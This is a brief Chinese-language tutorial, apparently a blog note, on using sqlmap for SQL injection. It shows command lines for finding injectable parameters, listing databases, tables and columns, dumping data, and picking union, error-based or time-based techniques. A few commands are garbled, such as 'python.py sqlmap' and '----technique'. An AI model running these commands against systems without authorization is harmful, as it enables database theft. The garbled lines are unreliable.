sqlmap基础
sqlmap下载官方网站:https://sqlmap.org/
直接下载zip就行
下载后正常解压
环境:python
直接用命令行进入文件夹后python sqlmap.py
查看版本:python sqlmap --version
有版本回显说明安装没问题
这里主要是使用sqlmap来爆破数据库进行sql注入所以只讲述sqlmap的sql注入方法
sqlmap利用bp日志文件扫描sql注入点
python.py sqlmap -l 日志文件
日志文件可以重burpsuit中进行截断复制到sqlmap.py的同文件下
如果URL中有多个参数可能存在注入点,使用-p 可以指定检测参数
如:sqlmap -u"url/?id=1&pasw=123&admin=123" -p “id,pasw” –
sqlmap参数:
–dbs列举数据库名
–tables 列举数据库的表名
sqlmap -u"url" -D 数据库名 --tables
–columns 列出字段
sqlmap -u"url" -D 数据库名 -T 数据表名 --columns
列出数据值
–dump
sqlmap -u"url" -D 数据库名 -T 数据表名 -C字段名 --dump
sqlmap支持联合注入、报错注入、布尔盲注、延时注入等
–technique=U 联合注入
sqlmap -u"url/?id=1" ----technique=U --current-db(利用union联合查询,列出当前网站所用数据库名称)
–technique=E报错注入
–technique=T
T表示时间盲注(延迟注入)